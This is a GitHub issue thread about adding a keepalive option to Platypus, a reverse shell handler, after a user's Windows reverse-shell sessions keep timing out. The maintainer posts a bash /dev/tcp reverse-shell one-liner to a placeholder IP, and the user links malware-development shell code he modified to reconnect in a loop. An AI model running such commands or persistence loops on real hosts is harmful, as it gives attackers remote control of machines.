KeepAlive option #7

Closed
ariadarkkkis opened this issue Feb 5, 2019 · 13 comments

@ariadarkkkis

Hi, it would be great to add keepalive to connected sessions.

@WangYihang
Owner

WangYihang commented Feb 8, 2019

@ariadarkkkis
Sorry for the late reply.
By default, all connections will stay alive unless the client process is killed.
I am not sure what you mean by keepalive; would you like to elaborate on that?

@ariadarkkkis
Author

ariadarkkkis commented Feb 8, 2019

I'm using the code to get a reverse shell, but the problem is that if you don't send anything to the client for about 5 minutes, I guess (I'm not sure, but definitely more than 2 minutes), the client will disconnect, and because I edited the code and added a loop, it will connect again. After some time, the client list is like 100 connections from the same IP address, but none of them will connect until I connect to one of them and send something, and then they will reconnect, and after that I have to send something to the client again and then I get the shell running. Even after getting the shell running and sending some commands, if you don't send something to the client within that time I said, it will disconnect again. BTW, I edited the code so it has a 60-second sleep (or timeout) before trying to connect to my server again after it disconnects.

@ariadarkkkis
Author

And BTW, I have a 1-core, 1 GB RAM VPS, and with a lot of clients (which is not a lot; most of them are duplicate clients), after some days CPU usage on the 1-core CPU will max out at 100%. And I have to kill Platypus and re-run it again.

@ariadarkkkis
Author

I guess it should have a keep-alive option in it in case anyone needs it. So it sends some packets to the client every, like, 60 seconds so the client won't disconnect from my server. I'm using Ubuntu 16.04 x64 LTS for running Platypus.

@WangYihang
Owner

The predecessor of this tool actually had this function, which was able to detect connections from the same IP and kill multiple connections from the same IP, but this function was removed due to possible NAT and port forwarding. You are right, I am thinking about whether I need to add the feature to kill connections from the same IP. Maybe make it a server option.
You know, due to the complexity of different operating systems and different shells, it is very difficult to detect whether it is from the same real host. Therefore, we have to use IP to uniquely identify a host. I don't know if this identifier is reasonable.

@WangYihang
Owner

How do you create the reverse shell session? Did you try to use bash commands like this?

bash -c 'bash >/dev/tcp/1.2.3.4/4444 0>&1 &'

@ariadarkkkis
Author

@WangYihang Sorry, I didn't paste the code. I use this code on Windows machines:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

@ariadarkkkis
Author

ariadarkkkis commented Feb 9, 2019

You can use the hostname as an identifier, or maybe add something like an identifier in a custom reverse shell like the one I gave you above. So the user can manually set the identifier, or it gets the hostname and some other information like CPU and OS and something and makes a hash out of them to make it unique.

@ariadarkkkis
Author

@WangYihang It broke my VPS. As I said before, after some days, the CPU load on the 1-core VPS will max out. I forgot to restart Platypus and now my VPS has broken.

@lnyzx lnyzx mentioned this issue Mar 12, 2019
@WangYihang
Owner

@ariadarkkkis Solved by @zxyxx, appreciate his excellent work!

@ariadarkkkis
Author

@zxyxx @WangYihang Can you make it replace a new connection from the same IP with the old one? Like, if a client with IP 1.2.3.4 connected 10 minutes ago and it sent another session now from the same IP, Platypus replaces the new session with the old one and removes the old one.

@ariadarkkkis
Author

Because I still have this problem that I can't rejoin a session after about 10 minutes, because the session times out. I'm using this as my reverse shell on Windows clients:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

I get this when I try to interact with a session from 30 minutes ago:

2019/03/18 05:37:20 Interacting with [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]
2019/03/18 05:37:20 Read from client failed
2019/03/18 05:37:20 Closing client: [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]

I used jump and then interact with that session. I don't know what the problem is and why the connection doesn't stay alive.

@WangYihang
Owner

@ariadarkkkis Hey, bro, thank you so much for your report. Could you please create a new issue to explain this feature request? (One issue for a single problem ~ thank u ~)
